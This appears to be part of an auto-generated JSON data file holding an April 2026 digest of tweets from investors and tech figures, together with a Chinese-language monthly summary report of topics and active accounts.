opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://nitter.net/Geiger_Capital/status/2046632586735243420#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T16:13:00+00:00]**\n> Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m, or lease for $5k a …\n[原文链接](https://nitter.net/Jason/status/2048797572014207114#m)\n\n**[2026-04-27T16:10:40+00:00]**\n> 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when you can take these on …\n[原文链接](https://nitter.net/Jason/status/2048796982227972344#m)\n\n**[2026-04-27T15:56:20+00:00]**\n> RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome extension works with any …\n[原文链接](https://nitter.net/lina_colucci/status/2048793378511536538#m)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://nitter.net/Jason/status/2048780089295302690#m)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n---\n\n### ✅ @charliebilello — Charlie Bilello(13 条)\n\n**[2026-04-27T13:50:42+00:00]**\n> 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quick…\n[原文链接](https://nitter.net/charliebilello/status/2048761760971096534#m)\n\n**[2026-04-27T13:16:36+00:00]**\n> The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n[原文链接](https://nitter.net/charliebilello/status/2048753179471323584#m)\n\n**[2026-04-27T13:08:19+00:00]**\n> With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjI…\n[原文链接](https://nitter.net/charliebilello/status/2048751094671585397#m)\n\n**[2026-04-27T12:53:00+00:00]**\n> RT by @charliebilello: Wondering which month is the best time to start investing? The right answer is any month. Just start!\n[原文链接](https://nitter.net/PeterMallouk/status/2048747238986305979#m)\n\n**[2026-04-26T16:18:48+00:00]**\n> RT by @charliebilello: Does a government shutdown negatively impact the stock market? No. The S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown w…\n[原文链接](https://nitter.net/charliebilello/status/2048436641451155650#m)\n\n**[2026-04-26T15:10:21+00:00]**\n> RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://nitter.net/charliebilello/status/2048419415222259820#m)\n\n**[2026-04-26T14:19:13+00:00]**\n> RT by @charliebilello: The stock market is at an all-time high. Credit spreads are near all-time lows. And inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per …\n[原文链接](https://nitter.net/charliebilello/status/2048406550897729561#m)\n\n**[2026-04-26T14:00:02+00:00]**\n> RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average…\n[原文链接](https://nitter.net/charliebilello/status/2048401720540061794#m)\n\n**[2026-04-26T13:45:00+00:00]**\n> RT by @charliebilello: Global Inflation Rates are on the RISE... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s\n[原文链接](https://nitter.net/charliebilello/status/2048397937156518387#m)\n\n**[2026-04-26T13:30:00+00:00]**\n> RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year... Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s\n[原文链接](https://nitter.net/charliebilello/status/2048394162366533935#m)\n\n**[2026-04-26T13:14:49+00:00]**\n> RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://nitter.net/charliebilello/status/2048390341221404827#m)\n\n**[2026-04-25T19:55:14+00:00]**\n> RT by @charliebilello: New video is up: 📈The Week in Charts - breaking down the most important charts and themes in markets... https://www.youtube.com/watch?v=p5e0ThPjIAg\n[原文链接](https://nitter.net/charliebilello/status/2048128721286992166#m)\n\n**[2026-04-25T13:31:00+00:00]**\n> RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett\n[原文链接](https://nitter.net/PeterMallouk/status/2048032027513864212#m)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://nitter.net/Svwang1/status/2047858045057909226#m)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://nitter.net/Svwang1/status/2047703469063377001#m)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://nitter.net/Svwang1/status/2047472537488302502#m)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://nitter.net/Svwang1/status/2047470402725921150#m)\n\n**[2026-04-20T21:42:30+00:00]**\n> 很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。\n[原文链接](https://nitter.net/Svwang1/status/2046343776378257515#m)\n\n**[2026-04-20T21:13:36+00:00]**\n> 很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。\n[原文链接](https://nitter.net/Svwang1/status/2046336504407142606#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T16:26:46.682458+00:00\n**分析账号**: 27个 | **活跃账号**: 21个 | **推文总量**: 258条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:170 条\n- **模型能力**:52 条\n- **交易与市场**:15 条\n- **投融资与并购**:13 条\n- **算力与芯片**:8 条\n\n## 三、活跃账号 Top10\n\n- @GaryMarcus: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @pmarca: 20 条\n- @eladgil: 20 条\n- @jason: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n- @elonmusk: 18 条\n\n## 四、代表性推文\n\n- @jason | 2026-04-27T16:13:00+00:00\n - Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 From hill country ranches to Austin in ten minutes?! If you could buy one for $2m,…\n - https://nitter.net/Jason/status/2048797572014207114#m\n- @jason | 2026-04-27T16:10:40+00:00\n - 10 minutes from manhattan to jfk is a game changer… … but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! Imagine when yo…\n - https://nitter.net/Jason/status/2048796982227972344#m\n- @AndrewYNg | 2026-04-27T15:58:13+00:00\n - AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faste…\n - https://nitter.net/AndrewYNg/status/2048793852702757151#m\n- @jason | 2026-04-27T15:56:20+00:00\n - RT by @Jason: update! the @twistartups AI sidebar is going well The goal: a live AI sidebar with 4 personas watching the pod in real time Progress update: ✅ Side bar (Chrome exten…\n - https://nitter.net/lina_colucci/status/2048793378511536538#m\n- @GaryMarcus | 2026-04-27T15:50:31+00:00\n - If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, thos…\n - https://nitter.net/GaryMarcus/status/2048791912149295182#m\n- @GaryMarcus | 2026-04-27T15:33:34+00:00\n - R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.\n - https://nitter.net/GaryMarcus/status/2048787646206677207#m\n- @GaryMarcus | 2026-04-27T15:31:37+00:00\n - This is totally wrong. Blaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and o…\n - https://nitter.net/GaryMarcus/status/2048787157536653627#m\n- @elonmusk | 2026-04-27T15:15:09+00:00\n - If extremely violent criminals are not imprisoned, eventually they will murder innocent people\n - https://nitter.net/elonmusk/status/2048783014075777369#m\n- @jason | 2026-04-27T15:03:32+00:00\n - Best accounts for following Austin air quality? @grok\n - https://nitter.net/Jason/status/2048780089295302690#m\n- @elonmusk | 2026-04-27T14:53:45+00:00\n - Excellent point\n - https://nitter.net/elonmusk/status/2048777628019032335#m\n- @GaryMarcus | 2026-04-27T14:27:36+00:00\n - yep, that’s what I do. I am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me. i don’t think that is going to…\n - https://nitter.net/GaryMarcus/status/2048771044987777428#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-4…\n - https://nitter.net/HarryStebbings/status/2048764743205134644#m\n- @HarryStebbings | 2026-04-27T14:02:33+00:00\n - Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is …\n - https://nitter.net/HarryStebbings/status/2048764741435179442#m\n- @charliebilello | 2026-04-27T13:50:42+00:00\n - 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending th…\n - https://nitter.net/charliebilello/status/2048761760971096534#m\n- @JeffDean | 2026-04-27T13:40:08+00:00\n - The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conve…\n - https://nitter.net/JeffDean/status/2048759102390899142#m\n- @GaryMarcus | 2026-04-27T13:32:43+00:00\n - ⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT a…\n - https://nitter.net/GaryMarcus/status/2048757233174122827#m\n- @HarryStebbings | 2026-04-27T13:30:16+00:00\n - Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. A…\n - https://nitter.net/HarryStebbings/status/2048756619622707452#m\n- @soumithchintala | 2026-04-27T13:29:14+00:00\n - This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternat…\n - https://nitter.net/soumithchintala/status/2048756358820827564#m\n- @sama | 2026-04-27T13:24:26+00:00\n - we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.…\n - https://nitter.net/sama/status/2048755148361707946#m\n- @charliebilello | 2026-04-27T13:16:36+00:00\n - The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s\n - https://nitter.net/charliebilello/status/2048753179471323584#m\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git 